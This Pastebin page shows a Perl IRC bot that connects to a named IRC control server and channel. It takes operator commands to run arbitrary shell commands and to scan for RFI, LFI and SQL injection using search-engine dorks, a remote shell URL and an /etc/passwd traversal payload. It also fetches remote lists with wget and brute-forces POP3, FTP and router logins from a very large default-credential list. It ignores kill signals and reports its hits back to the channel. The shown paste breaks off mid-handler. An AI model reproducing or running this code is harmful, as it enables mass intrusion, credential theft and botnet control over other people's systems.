Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl #-Voo_Doo NewEr DIE(); __ |
- use IO::Socket::INET;
- use strict;
- use Mail::POP3Client;
- use strict;
- use Net::POP3;
- use strict;
- use warnings;
- use Net::FTP;
- use IO::Socket;
- ##############
- #use Parallel::ForkManager; my $zpm=new Parallel::ForkManager(125);
- my($http_stream_out,%http_loop_check,$response2,$columna,$columns,$column,$union,$inyection,$sql,$response,$tabla,$server,$channel,$chankey,$port,$nickp,$owner,$lfi_shell,$lfi_text,$rfi_shell,$rfi_text,$sql_error,$sql_text,$maxsite,$v_threads,$get_timeout,$sock,$mid,$uc,@irc_parsed,@irc_parsed1,@rfi_sites,@rfi_urls,@bosses);
- #--------------------------------------------
- my($server,$channel,$chankey,$port,$nickp,$owner) = ("blue.indoexploit.org","#ssd","","6667","G_test","G-one");
- #--------------------------------------------
- my %config = (max_childs => 60); my($ipa,$ipb,$ipc,$ipd,$sox,$user,$pass);
- my $childs = 50;
- my ($host,$password,$n,$buffer,$OK,$octets,$messages,$mess,$octmess,$sockz);
- my $savev = "http://ave.bms-group.pl/vte.php";
- my ($rfi_shell,$rfi_text) = ("http://www.nopaste.pl/Source/om7.txt?","<b>e10adc3949ba59abbe56e057f20f883e<\/b>");
- my($sql_error,$sql_text) = ("-'","sql syntax|sql error|right syntax to use near");
- my($lfi_shell,$lfi_text) = ("../../../../../etc/passwd%00","root:(.+):(.+):(.+):(.+):(.+):(.+)"); #Add a NULL byte
- my @tabele=('orders','order','customer','customers','payment','payments'); #my @kolumny=('ccv','cvv','cvs','ccv2');
- #--------------------------------------------
- my @http_AU_Voo = ("ftp:ftp","root:123456","root:anko","root:nosoup4u","root:uClinux","root:ubnt","root:root","admin:1111","root:admin","telnet:telnet","admin:12345","vagrant:vagrant","CISCO:CISCO","test:test","guest:guest","root:password","admin:password","operator:operator","ubnt:ubnt","root:toor","support:support","admin:admin","admin:1234","root:root","root:1234","usuario:usuario","user:user","root:d1sn4t3n*123/","root:rpitc","root:waldo","root:raspberrypi","root:admin","root:dreambox","root:0000","root:1234","root:1234","root:welc0me","root:waldo","root:000000","root:system","root:rpitc","root:admintrup","root:seiko2005","root:rpitc","root:dreambox","root:rpitc","root:system","root:ubnt","root:raspberrypi","root:-","homun:q1w2e3r4","pi:raspberry","pi:raspberryraspberry993311","bkpmes:bkpmes","root:admintrup","root:1234","root:seiko2005","root:admin","root:111111","root:admin","root:seiko2005","root:openelec","root:xmhdipc","root:admintrup","root:openelec","root:xmhdipc","root:0000","root:xmhdipc","root:Zte521","root:ubnt","root:12345","root:root","donrepara:d1sn4t3n*123/","admin:sysuser","root:root123","root:123456","root:Gr!gR$891","ma2:Miguel1985","root:xmhdipc","root:welc0me","root:Zte521","root:password","root:12345","root:nosoup4u","root:waldo","root:system","root:111111","root:waldo","root:ubnt","root:seiko2005","root:system","root:welc0me","root:openelec","root:xmhdipc","root:default","root:ubnt","root:admintrup","root:seiko2005","root:password","menu:gbl123!@#","root:Hiersun2017@","root:system","root:anko","root:0000","root:0000","root:default","root:system","root:nosoup4u","root:root","root:000000","root:1234","root:system","root:Zte521","root:waldo","root:seiko2005","root:000000","root:welc0me","root:admin","root:rpitc","root:anko","root:1234","root:welc0me","root:111111","root:12345","root:password","root:openelec","root:raspberrypi","root:system","root:seiko2005","root:123456","jboss:123456","root:db00Hdear$2017","root:root","root:Vaquita51611235",":","admin:12345","master:12345","support:support","1234:1234","admin:admin","super:super","root:admin","root:root","root:cycl3R0cks!","admin:","admin:&","admin:<Any pass>","admin:0000","admin:0987654321","admin:1","admin:1111","admin:11111","admin:111111","admin:123","admin:123123","admin:123321","admin:1234","admin:12345","admin:123456","admin:1234567","admin:12345678","admin:123456789","admin:1234567890","admin:123654","admin:159753","admin:159753","admin:1q2w3e4r","admin:1qaz2wsx","admin:1qazxsw2","admin:22","admin:2222","admin:4321","admin:4dm1n","admin:7ujMko0admin","admin:abc123","admin:admin","Admin:admin","admin:admin01","admin:admin1","admin:admin12","admin:admin123","admin:admin1234","admin:admin12345","admin:admin123456","admin:administrator","admin:adslolitec","admin:adslolitec","admin:AitbISP4eCiG","admin:<Any pass>","admin:articon","admin:asante","admin:asd","admin:atlantis","admin:barricade","admin:baseball","admin:change","admin:changeme","admin:cisco","admin:client","admin:default","admin:demo","admin:diamond","admin:dragon","admin:epicrouter","admin:ftp","admin:ftpuser","admin:guest","admin:guest","admin:hello","admin:heslo","admin:ironport","admin:manager","admin:master","admin:monitor","admin:motorola","admin:netadmin","admin:ninja","admin:nopass","admin:ololo","admin:openelec","admin:operator","admin:osmc","admin:pass","admin:passw0rd","admin:password","admin:password123","admin:public","admin:q1w2e3r4","admin:q1w2e3r4","admin:qazwsx","admin:qwerty","admin:raspberry","admin:root","admin:secure","admin:service","admin:service123","admin:setup","admin:sshd","admin:super","admin:support","admin:switch","admin:system","admin:test","admin:test123","admin:ubnt","admin:user","admin:user123","admin:uucp","admin:ipcam_rt5350","admin:cat1029","admin:vertex25ektks123","admin:7ujMko0admin","admin:vizxv","admin:antslq","admin:1001chin","admin:5up","admin:zhongxing","admin:1234qwer","admin:qazxsw","admin:ttnet","admin:zsun1188","admin:oelinux123","admin:oelinux1234","admin:ivdev","admin:GM8182","admin:zyad1234","admin:smcadmin","admin:aquario","admin:aquario","admin:alpine","admin:hunt5759","admin:meinsm","1234:","1234:<Any pass>","1234:111111","1234:123","1234:1234","1234:12345","1234:1234567890","1234:admin","1234:<Any Pass>","1234:nopass","root:","Root:","root:!QAZ2wsx","root:<Any pass>","root:0000","root:000000","root:0987654321","root:0987654321","root:1","root:11111","root:111111","root:121212","root:123","root:123.com","root:123123","root:123321","root:1234","root:12345","root:123456","root:1234567","root:12345678","root:123456789","root:1234567890","root:123qwe","root:159753","root:1q2w3e","root:1q2w3e4r","root:1q2w3e4r5t","root:1q2w3e4r5t","root:1qaz!QAZ","root:1qaz2wsx","root:1qazxsw2","root:31415926","root:5up","root:666666","root:7ujMko0admin","root:88888888","root:987654321","root:a","root:a123456","root:abc123","root:abcd1234","root:access","root:admin","root:admin01","root:admin1","root:admin123","root:adminadmin","root:adminpassword","root:adminpassword","root:alpine","root:anypass","root:aquario","root:ascend","root:asdf1234","root:athens","root:attack","root:blender","root:calvin","root:casa","root:centos","root:changeme","root:Cisco","root:cisco","root:cms500","root:default","root:dragon","root:dreambox","root:fivranne","root:fivranne","root:football","root:juantech","root:jvbzd","root:klv123","root:klv1234","root:letacla","root:letmein","root:live","root:manager","root:master","root:Mau'dib","root:monkey","root:nimda","root:nopass","root:openelec","root:operator","root:p","root:password","root:permit","root:pfsense","root:pi","root:plcmspip","root:public","root:q1w2e3r4t5","root:qazwsx","root:qwe123","root:qwerty","root:raspberry","root:redhat","root:root","admin:admin","admin:password","admin:7ujMko0admin","admin:admin123","admin:admin1","admin:password","admin:1111","admin:manager","admin:7ujMko0admin","admin:admin1","admin:pfsense","admin:default","admin:1111","admin:admin123","admin:default","admin:password","admin:admin","admin:motorola","admin:12345","admin:default","web:sdAakx4A","root:dreambox","root:root","passfeel:q1w2e3r4","user:user1234","root:root","revisor:revisor","admin:admin","admin:manager","admin:aerohive","admin:changeme","admin:admin","admin:admin1234","admin:1111","admin:manager","admin:motorola","admin:manager","admin:password","admin:1234","admin:admin1","admin:aerohive","admin:admin","admin:admin1234","admin:admin1","admin:admin1234","admin:12345","admin:password","admin:default","menu:","invoices:invoices","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","support:support","root:dreambox","root:raspberrypi","root:admintrup","root:000000","root:ubnt","root:rpitc","root:111111","root:root","root:HKhiersun2017","admin:admin1234","admin:default","admin:1111","admin:12345","admin:admin","admin:admin","admin:1111","admin:aerohive","admin:12345","admin:default","admin:1234","admin:1234","admin:7ujMko0admin","admin:admin","admin:admin123","admin:admin1","admin:admin1234","admin:admin","admin:12345","admin:7ujMko0admin","admin:12345","admin:password","admin:admin1","admin:changeme","admin:7ujMko0admin","admin:default","admin:admin1234","admin:1111","admin:password","admin:admin","admin:1111","admin:admin1234","admin:password","admin:1111","admin:pfsense","admin:motorola","admin:1111","admin:admin1234","admin:password","admin:pfsense","admin:1234","admin:admin1","root:root","dkalathil:Wwse123","root:default","root:xmhdipc","root:dreambox","root:system","root:12345","root:rpitc","root:xmhdipc","root:111111","root:openelec","root:rpitc","root:admintrup","root:seiko2005","root:welc0me","root:raspberrypi","root:system","root:12345","root:dreambox","root:password","root:12345","root:admintrup","root:raspberrypi",":","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","service:service","admin:123","geozhsia:LUbIv5NmvJDOS7Hkp3eddaACToR2oh29","cav:cavsys","relic:q1w2e3r4","root:root","root:root","pi:raspberry","pi:raspberryraspberry993311","idst6:q1w2e3r4","root:root","root:admin","admin:admin","telnet:telnet","ubnt:ubnt","user:user","support:support","0000:0000","1111:1111","admin:password","admin:1234567890","osmc:osmc","pi:raspberry","operator:operator","pi:1234","root:pi","user:123456","service:service","root:linux","root:password","test:test","phion:123","root:anko","root:waldo","root:nosoup4u","root:rpitc","root:0000","root:Zte521","root:welc0me","root:welc0me","root:admin","root:system","root:anko","root:uClinux","root:xmhdipc","root:12345","root:system","root:0000","root:admin","root:0000","root:waldo","root:nosoup4u","root:uClinux","debian-spamd:debian-spamd","root:123456","root:111111","admin:12345","root:xmhdipc","root:dreambox","admin:changeme","root:rpitc","root:admin","admin:motorola","root:1234","root:admin","admin:admin1","root:ubnt","root:12345","root:rpitc","admin:7ujMko0admin","root:0000","root:uClinux","admin:1111","root:root","root:123456","root:dreambox","admin:manager","root:0000","root:nosoup4u","admin:admin1","root:system","root:welc0me","admin:manager","root:welc0me","root:waldo","admin:1234","root:seiko2005","root:root","admin:default","root:111111","root:rpitc","admin:1234","root:ubnt","root:admin","admin:admin123","root:nosoup4u","root:Zte521","admin:admin1234","root:123456","root:raspberrypi","admin:12345","root:000000","root:waldo","admin:manager","root:seiko2005","root:dreambox","admin:1234","root:1234","root:admin","admin:admin123","root:12345","root:system","admin:admin1234","root:password","root:admintrup","admin:changeme","root:0000","root:waldo","admin:default","root:admin","root:waldo","root:0000","root:anko","root:nosoup4u","root:password","root:111111","root:default","root:raspberrypi","root:123456","root:anko","root:Zte521","root:nosoup4u","root:Zte521","root:1234","root:1234","root:uClinux","root:dreambox","root:dreambox","root:system","root:000000","root:nosoup4u","root:seiko2005","root:12345","root:111111","root:admintrup","root:seiko2005","root:admintrup","root:anko","root:root","root:root","iedu:q1w2e3r4","root:vmware123","root:vmware","root:root123456789","root:123456","root:muiemulta","root:pula","root:muiema","root:260788","aalbornoz:qwaszx1725","root:root","root:Ps856094533238","root:vmware123","root:vmware","root:root123456789","root:raspberrypi","root:openelec","root:admintrup","root:rpitc","root:default","root:default","root:raspberrypi","root:xmhdipc","root:welc0me","root:nosoup4u","root:admin","root:root","root:root","proxy:proxy");
- my ($maxsite,$v_threads,$get_timeout) = (20,15,14); $0 = "aVe";
- %SIG = ('HUP','IGNORE','INT','IGNORE','PIPE','IGNORE','TERM','IGNORE'); # wsill not be able to !kill scans
- #--------------------------------------------
- sub randnick($){return "$_[0]" . int(rand(1)*100) . int(rand(1)*200) . int(rand(1)*300);} #sub randnick($){return "$_[0]";}
- sub send_raw($){print $sock "$_[0]\r\n";}
- sub send_msg($$){print $sock "PRIVMSG $_[0] :$_[1]\r\n";}
- sub in_array {for(my $x=1;$x<=$#_;$x++){if($_[$x] eq $_[0]){return $x;}}return 0;}
- sub array_num {my $y=0;for(my $x=1;$x<=$#_;$x++){if($_[$x] eq $_[0]){$y++;}}return $y;}
- sub remove_dups(@){my(@Uns,@S,$x) = (@_);for($x=0;$x<=$#Uns;$x++){push(@S,$Uns[$x]) unless in_array($Uns[$x],@S);}return @S;}
- sub tchomp {my $text = shift;$text =~ s/^(.*?)(?:\x0D\x0A|\x0A|\x0D|\x0C|\x{2028}|\x{2029})/$1/s;return $text;}
- sub urlencode($){ my $unclean = shift; $unclean =~ s/\?/\%3f/gi; $unclean =~ s/ /\+/gi; $unclean =~ s/:/\%3A/gi; $unclean =~ s/\//\%2F/gi; $unclean =~ s/&/\%26/gi; $unclean =~ s/\"/\%22/gi; $unclean =~ s/\'/\%27/gi; $unclean =~ s/,/\%2C/gi; $unclean =~ s/\\/\%5C/gi; return $unclean; }
- sub urldecode($){ my $clean = shift; $clean =~ s/\%3f/\?/gi; $clean =~ s/\+/ /gi; $clean =~ s/\%3A/:/gi; $clean =~ s/\%2F/\//gi; $clean =~ s/\%26/&/gi; $clean =~ s/\%22/\"/gi; $clean =~ s/\%27/\'/gi; $clean =~ s/\%2C/,/gi; $clean =~ s/\%5C/\\/gi; return $clean; }
- sub getreq($){
- my($url,$query,$xcon,$host,$get,@content,@ags) = ($_[0]);
- @ags = ("Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.6) Gecko/20050223 Firefox/1.0.1","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20061201 Firefox/2.0.0.4 (Ubuntu-feisty)","Microsoft Pocket Internet Explorer/0.6","Microsoft Internet Explorer/4.0b1 (Windows 95)");
- $url =~ m/http:\/\/(.*?)\/(.*)/;
- ($host,$url,$query) = ($1,"$1/$2","/$2");
- eval{
- local $SIG{ALRM} = sub{print("[-] Timed out - $url\n");die;};
- alarm $get_timeout;
- $get = IO::Socket::INET->new(PeerAddr=>"$host:80",Proto=>"tcp") or sub{die("FAILED\n");};
- print $get "GET $query HTTP/1.0\r\nHost: $host\r\nUser-Agent: " . $ags[int(rand(0)*$#ags)] . "\r\nAccept: */*\r\nConnection: close\r\n\r\n";
- @content = <$get>;
- $xcon = "@content";
- close($get);
- alarm 0;
- }; return urldecode($xcon);
- }
- sub rfi_onet($$){
- my($dork,$start,$content,$dom,$page,$dad,$url) = (urlencode($_[0]),$_[1]);
- print "[Onet-] http://szukaj.onet.pl/0,$start,query.html?qt=$dork\n";
- $content = &getreq("http://szukaj.onet.pl/0,$start,query.html?qt=$dork");
- if($content =~ m/<h1>We\'re sorry\.\.\.<\/h1>/){print "[0n3t] Google killed you\n";return 0;}
- while($content =~ m/<a href=\"http:\/\/(.*?)\"/ig){
- $url = "http://$1";
- if(($url =~ m/http:\/\/(www\.|)([\w\-\_\.]*)\/(.*?)$/) && (&array_num("http://$1$2",@rfi_sites)<=$maxsite) && (!in_array($url,@rfi_urls))){
- ($dom,$page) = ("http://$1$2","/$3");
- $dad = $dom.$page;
- push(@rfi_sites,$dom);
- push(@rfi_urls,$dad);
- #print "[GOO-SCAN] $dad\n";
- $uc++;
- }
- }
- if($content =~ m/button nextActive\">Nast/){ print "[0n3t] Another page: " . ($start + 100) . "\n"; &rfi_onet($dork,($start + 1),$_[2]); }
- return $uc;
- }
- sub url_validate(@){
- my($choice,$pagen) = ($_[0],$_[1]);
- my(@urls,@fails,@paramlist,@params,@checks,$url,$tmp1,$tmp2,$chk,$m_add,$m_text,$badu,$count,$count2,@rfis);
- $badu = "(\w*\.baidu\.)|(\w*\.microsoft\.)|(\w*\.onet\.)|(\w*\.live\.)|(\w*\.w3\.org)|(\w*\.msnscache\.)|(\w*\.google\.)|(\w*\.yahoo\.)|(\w*\.aol\.)|(\w*\.altavista\.)|(\w*\.ask\.)|(209\.85\.173\.104)";
- for(2..$#_){ if($_[$_] !~ m/$badu/i){ push(@urls,$_[$_]); } }
- @urls = &remove_dups(@urls);
- foreach(@urls){ push(@rfis,$_) if $_ =~ m/^http:\/\/(www\.|)([\w\-\_\.]*)\/([\w\-\_\.\/\;]*)\?([\w\-\_\.]*)=(.*?)$/; }
- if(@urls){
- if($choice eq "DORK"){
- foreach $url(@urls){
- $m_add = $rfi_shell; $m_text = $rfi_text;
- if($url =~ m/^http:\/\/(www\.|)([\w\-\_\.]*)\/([a-z0-9\.\-\_\/]*)\/([\w\-\_\.\/\;]*)/){ push(@checks,"http://$1$2/$3/$pagen"); }
- elsif($url =~ m/^http:\/\/(www\.|)([\w\-\_\.]*)\/([\w\-\_\.\/\;]*)/){
- push(@checks,"http://$1$2/$pagen");
- }
- }
- }
- elsif($choice eq "RFI") {
- foreach $url(@rfis){
- $m_add = $rfi_shell;
- $m_text = $rfi_text;
- @paramlist = split(/\?/,$url);
- @params = split(/=/,$paramlist[1]);
- $tmp1 = "";
- for(0..$#params-1){
- $tmp1 .= $params[$_] . "="; $tmp2 = $paramlist[0] . "?" . $tmp1;
- push(@checks,$tmp2);
- }
- }
- }
- elsif($choice eq "LFI") {
- foreach $url(@rfis){
- $m_add = $lfi_shell;
- $m_text = $lfi_text;
- @paramlist = split(/\?/,$url);
- @params = split(/=/,$paramlist[1]);
- $tmp1 = "";
- for(0..$#params-1){
- $tmp1 .= $params[$_] . "="; $tmp2 = $paramlist[0] . "?" . $tmp1;
- push(@checks,$tmp2);
- }
- }
- }
- elsif($choice eq "SQL"){
- foreach $url(@rfis){
- $m_add = $sql_error;
- $m_text = $sql_text;
- @paramlist = split(/\?/,$url);
- @params = split(/=/,$paramlist[1]);
- $tmp1 = "";
- for(0..$#params-1){
- $tmp1 .= $params[$_] . "="; $tmp2 = $paramlist[0] . "?" . $tmp1;
- push(@checks,$tmp2);
- }
- }
- }
- }
- else{ print "[VAL-] [$choice] No sites to clean\n"; return 0; }
- @checks = &remove_dups(@checks);
- #send_msg($channel,"[VAL] [$choice] " . ($#checks+1) . " URLS to check");
- print "[URL VALIDATION] [$choice] " . ($#checks+1) . " URLS TO CHECK\n";
- foreach $chk(@checks){
- $count++; $count2++; $chk .= $m_add;
- if(&getreq($chk) =~ m/$m_text/i){ send_msg($channel,"$chk"); print "[VAL+] Win: $chk\n\n"; }
- else{ print "[VAL-] Fail: $chk\n"; }
- if($count==250){ send_msg($channel,"[VAL] [$choice] $count2 of " . $#checks . " urls completed"); $count=0; }
- elsif($checks[$#checks] eq $checks[$count]){
- #send_msg($channel,"[VAL] [$choice] All " . $#checks . " urls completed");
- $count=0; $count2=0;
- }
- }
- return 0;
- }
- $mid = fork(); exit if $mid; exit if undef $mid;
- $sock = new IO::Socket::INET(PeerAddr=>"$server:$port",Proto=>"tcp");
- die("Couldn't connect: $!\n") unless $sock;
- my $nick = &randnick($nickp);
- &send_raw("NICK " . $nick); &send_raw("USER " . &randnick("s") . " " . &randnick("z") . " * :HELLOSIR");
- if($chankey){&send_raw("JOIN $channel $chankey");}else{&send_raw("JOIN $channel");}
- while(<$sock>){
- @irc_parsed = split(/\r\n/,&tchomp($_));
- @irc_parsed1 = split(/ /,$irc_parsed[0]);
- print $irc_parsed[0] . "\n";
- if($irc_parsed1[0] eq "PING"){ send_raw("PONG " . $irc_parsed1[1]); }
- elsif($irc_parsed1[1] eq "001"){ if($chankey){&send_raw("JOIN $channel $chankey");}else{&send_raw("JOIN $channel");} }
- elsif(($irc_parsed1[1] eq "433") || ($irc_parsed1[1] eq "436")){ &send_raw("NICK " . randnick($nickp)); send_raw("JOIN " . $channel); }
- elsif($irc_parsed1[1] eq "475"){ send_msg($owner,"key $chankey for $channel is WRONG"); die("Channel key is WRONG\n"); }
- #--------------
- elsif($irc_parsed1[3] =~ m/(.*)http:\/\/(.*)[=](.+?)'/ || $irc_parsed1[3] =~ m/http:\/\/(.*)[=]-1/ || $irc_parsed1[3] =~ m/(.*)http:\/\/(.*)[=]/ || $irc_parsed1[3] =~ m/(.*)http:\/\/(.*)[=]-1/ || $irc_parsed1[3] =~ m/(.*)http:\/\/(.*)[=]'/){ if(my $xid = fork){ waitpid($xid,0); } else{ if(fork){ exit; } else{ my $link = "http://".$2."="; &sqlbrute($link,20); exit; } } }
- elsif($irc_parsed1[3] =~ m/(.*)http:\/\/(.*)[=](.+?)passwd/ || $irc_parsed1[3] =~ m/(.*)http:\/\/(.*)[=](.+?)passwd%00/){ if(my $xid = fork){ waitpid($xid,0); } else{ if(fork){ exit; } else{ my $link = "http://".$2."="; &lfibrute($link); exit; } } }
- #--------------
- elsif($irc_parsed1[1] eq "KICK"){ if($chankey){ &send_raw("JOIN $channel"); } else{ &send_raw("JOIN $channel $chankey"); } }
- elsif(($irc_parsed1[1] eq "JOIN") && (substr($irc_parsed1[2],1) ne $channel)){ &send_raw("PART ".substr($irc_parsed1[2],1)); }
- if(($irc_parsed1[0] =~ m/:(.+)!(.+)\@(.+)/) || ($irc_parsed1[0] =~ m/:(.+)!~(.+)\@(.+)/)){
- if(($irc_parsed1[4] eq $nick) || ($irc_parsed1[4] eq "all")){
- $irc_parsed1[0] = $1;
- if($irc_parsed1[3] eq ":!wypierdalac"){ send_raw("QUIT"); exit; }
- elsif(($irc_parsed1[3] eq ":!kill") && ($irc_parsed1[5] =~ m/(\d*)/)){
- my $pid = $irc_parsed1[5];
- my $ppid = "$$";
- if($pid eq $ppid){ send_msg($irc_parsed1[0],"[PROC] Could not kill $pid, it is scan process"); }
- else{
- my $Prc = system("kill -9 $pid");
- if(!$Prc){ send_msg($channel,"[PROC] PID $pid {KILLED}"); }
- elsif($Prc eq "256"){ send_msg($channel,"[PROC] PID $pid {NO EXIST}"); }
- else{ send_msg($channel,"[PROC] PID $pid {OTHER ERROR}"); }
- }
- }
- elsif(($irc_parsed1[3] eq ":!rfishell") && ($irc_parsed1[5] =~ m/http:\/\/(.+)/)){
- if(!$1 =~ m/\?$/){ $rfi_shell = "http://".$1."?"; } else{ $rfi_shell = "http://$1"; }
- send_msg($channel,"[RFI] shell set: $rfi_shell");
- }
- elsif(($irc_parsed1[3] eq ":!rfishell") && (!$irc_parsed1[5])){
- if($rfi_shell){ send_msg($channel,"[RFI] Shell: $rfi_shell"); }
- elsif(!$rfi_shell){ send_msg($channel,"[RFI] No shell: set one with !rfishell $nick <RFI script/shell>"); }
- }
- elsif(($irc_parsed1[3] eq ":!rfitext") && (!$irc_parsed1[5])){
- if($rfi_text){ send_msg($channel,"[RFI] Text: $rfi_text"); }
- elsif(!$rfi_text){ send_msg($channel,"[RFI] No text: set one with !rfitext $nick <text in shell>"); }
- }
- elsif(($irc_parsed1[3] eq ":!rfitext") && ($irc_parsed1[5])){
- $rfi_text = "";
- for(5..$#irc_parsed1){ $rfi_text .= $irc_parsed1[$_] . " "; }
- $rfi_text = substr($rfi_text,0,length($rfi_text)-1);
- send_msg($channel,"[RFI] text set: $rfi_text");
- }
- elsif(($irc_parsed1[3] eq ":!sqlerror") && ($irc_parsed1[5])){
- $sql_error = "";
- for(5..$#irc_parsed1){ $sql_error .= $irc_parsed1[$_] . " "; }
- $sql_error = substr($sql_error,0,length($sql_error)-1);
- send_msg($channel,"[SQL] error set: $sql_error");
- }
- elsif(($irc_parsed1[3] eq ":!sqlerror") && (!$irc_parsed1[5])){
- if($sql_error){ send_msg($channel,"[SQL] Error: $sql_error"); }
- elsif(!$sql_error){
- send_msg($channel,"[SQL] No error: set one with !sqlerror $nick <sql error>");
- }
- }
- elsif(($irc_parsed1[3] eq ":!sqltext") && ($irc_parsed1[5])){
- $sql_text = "";
- for(5..$#irc_parsed1){ $sql_text .= $irc_parsed1[$_] . " "; }
- $sql_text = substr($sql_text,0,length($sql_text)-1);
- send_msg($channel,"[SQL] text set: $sql_text");
- }
- elsif(($irc_parsed1[3] eq ":!sqltext") && (!$irc_parsed1[5])){
- if($rfi_text){ send_msg($channel,"[SQL] Text: $sql_text"); }
- elsif(!$rfi_text){ send_msg($channel,"[SQL] No text: set one with !sqltext $nick <SQL error text>"); }
- }
- elsif($irc_parsed1[3] eq ":!test"){ if(my $xid = fork){ waitpid($xid,0); } else{ if(fork){ exit; } else{ send_msg($channel,"[TEST] Working!"); exit; } } }
- elsif(($irc_parsed1[3] eq ":!podajlfi") && ($irc_parsed1[5])){
- my($dork); for(5..$#irc_parsed1){$dork .= $irc_parsed1[$_] . " ";} $dork = substr($dork,0,length($dork)-1);
- if(my $xid = fork){ waitpid($xid,0); }
- else{
- if(my $dad=fork){ send_msg($channel,"[SYS] Running system: $dork - Stop with !kill $nick $dad"); exit; }
- else{
- my $save = "/tmp/".int(rand(1)*100);
- &getstore($dork,$save);
- send_msg($channel,"safed $dork $save");
- my $czaj = $save; open(FILE, $czaj); print("open $czaj \r\n");
- while(<FILE>) {
- my $jo=$_; chomp $jo; $jo=~s/\n//; $jo=~s/\r//;
- if($jo=~ /(.*?[=])/g){ &lfibrute($1); }
- #sleep 1*60; # need ?
- }
- close(FILE); `rm -rf $czaj`;
- }
- exit;
- }
- }
- elsif(($irc_parsed1[3] eq ":!podajsql") && ($irc_parsed1[5])){
- my($dork); for(5..$#irc_parsed1){$dork .= $irc_parsed1[$_] . " ";} $dork = substr($dork,0,length($dork)-1);
- if(my $xid = fork){ waitpid($xid,0); }
- else{
- if(my $dad=fork){ send_msg($channel,"[SYS] Running system: $dork - Stop with !kill $nick $dad"); exit; }
- else{
- my $save = "/tmp/sqllist.txt";
- system("wget ".$dork." -O ".$save);
- #&getstore($dork,$save);
- send_msg($channel,"safed $dork $save");
- my $czaj = $save; open(FILE, $czaj); print("open $czaj \r\n");
- #$zpm->start and next;
- while(<FILE>) {
- my $jo=$_; chomp $jo; $jo=~s/\n//; $jo=~s/\r//;
- if($jo=~ /(.*?[=])/g){ print($1."\n"); &sqlbrute($1,20); }
- #sleep 1*60; # need ?
- #$zpm->finish;
- }
- close(FILE); `rm -rf $czaj`;
- }
- exit;
- }
- }
- elsif(($irc_parsed1[3] eq ":!podajpop3") && ($irc_parsed1[5])){
- my($dork); for(5..$#irc_parsed1){$dork .= $irc_parsed1[$_] . " ";} $dork = substr($dork,0,length($dork)-1);
- if(my $xid = fork){ waitpid($xid,0); }
- else{
- if(my $dad=fork){ send_msg($channel,"[SYS] Running system: $dork - Stop with !kill $nick $dad"); exit; }
- else{
- my $save = "/tmp/x".int(rand(1)*100);
- system("wget ".$dork." -O ".$save);
- #&getstore($dork,$save);
- send_msg($channel,"safed $dork $save");
- my $czaj = $save; open(FILE, $czaj); print("open $czaj \r\n");
- while(<FILE>) { #$zpm->start and next;
- my $jo=$_; chomp $jo; $jo=~s/\n//; $jo=~s/\r//;
- if($jo=~ /(.*)\@(.*):(.*)/g){
- my $mail = $1; my $dom = $2; my $pass = $3; my $cal = $mail.'@'.$dom.':'.$pass;
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &pop3($cal); } }
- } sleep 1; # need ?
- }
- close(FILE); # `rm -rf $czaj`;
- }
- exit;
- }
- }
- elsif(($irc_parsed1[3] eq ":!system") && ($irc_parsed1[5])){
- my($dork);
- for(5..$#irc_parsed1){$dork .= $irc_parsed1[$_] . " ";}
- $dork = substr($dork,0,length($dork)-1);
- if(my $xid = fork){ waitpid($xid,0); }
- else{
- if(my $dad=fork){
- send_msg($channel,"[SYS] Running system: $dork - Stop with !kill $nick $dad");
- exit;
- }
- else{
- my @cmdresult = split(/\n/,`$dork`);
- foreach(@cmdresult){
- send_msg($irc_parsed1[0],"$_");
- sleep(2);
- }
- exit;
- }
- }
- }
- elsif(($irc_parsed1[3] eq ":!router") && ($irc_parsed1[5])){
- my($dork);
- for(5..$#irc_parsed1){$dork .= $irc_parsed1[$_] . " ";}
- $dork = substr($dork,0,length($dork)-1);
- if(my $xid = fork){ waitpid($xid,0); }
- else{
- if(my $dad=fork){
- send_msg($channel,"[SYS] Running system: $dork - Stop with !kill $nick $dad");
- exit;
- }
- else{
- &main($dork,"rou");
- }
- exit;
- }
- }
- elsif(($irc_parsed1[3] eq ":!ftp") && ($irc_parsed1[5])){
- my($dork);
- for(5..$#irc_parsed1){$dork .= $irc_parsed1[$_] . " ";}
- $dork = substr($dork,0,length($dork)-1);
- if(my $xid = fork){ waitpid($xid,0); }
- else{
- if(my $dad=fork){
- send_msg($channel,"[SYS] Running system: $dork - Stop with !kill $nick $dad");
- exit;
- } else{ &main($dork,"ftp"); }
- exit;
- }
- }
- elsif(($irc_parsed1[3] eq ":!pop3") && ($irc_parsed1[5])){
- my($dork);
- for(5..$#irc_parsed1){$dork .= $irc_parsed1[$_] . " ";}
- $dork = substr($dork,0,length($dork)-1);
- if(my $xid = fork){ waitpid($xid,0); }
- else{
- if(my $dad=fork){
- #send_msg($channel,"[SYS] Running system: $dork - Stop with !kill $nick $dad");
- exit;
- } else{ &pop3($dork); &nag($user,$password,$host); }
- exit;
- }
- }
- elsif($irc_parsed1[3] eq ":!procs"){
- if(my $xid = fork){ waitpid($xid,0); }
- else{
- if(fork){ exit; } else{
- my @procs = split(/\n/,`ps aux | grep $0`);
- foreach(@procs){ send_msg($irc_parsed1[0],"[PROC] PS: $_"); sleep(2); }
- exit;
- }
- }
- }
- elsif(($irc_parsed1[3] eq ":!rfi") && ($irc_parsed1[5])){
- my($dork);
- for(5..$#irc_parsed1){$dork .= $irc_parsed1[$_] . " ";}
- $dork = substr($dork,0,length($dork)-1);
- my $sc1 = fork;
- if($sc1){ waitpid($sc1,0); } elsif($sc1 == 0){ my $sc2 = fork;
- if($sc2){ send_msg($irc_parsed1[0],"[RFI] Dork: \"$dork\" - Stop with !kill $nick $sc2"); exit; }
- elsif($sc2==0){
- send_msg($channel,"[RFI] Dork: \"$dork\" Starting");
- send_msg($channel,"[RFI] [Onet] Dork: \"$dork\" - Results: " . &rfi_onet($dork,"0")); $uc=0;
- if($#rfi_urls){ #send_msg($channel,"[RFI] Dork: \"$dork\" - Validating " . ($#rfi_urls+1) . " URL's");
- &url_validate("RFI","",@rfi_urls); send_msg($channel,"[RFI] Dork: \"$dork\" - Finished");
- }
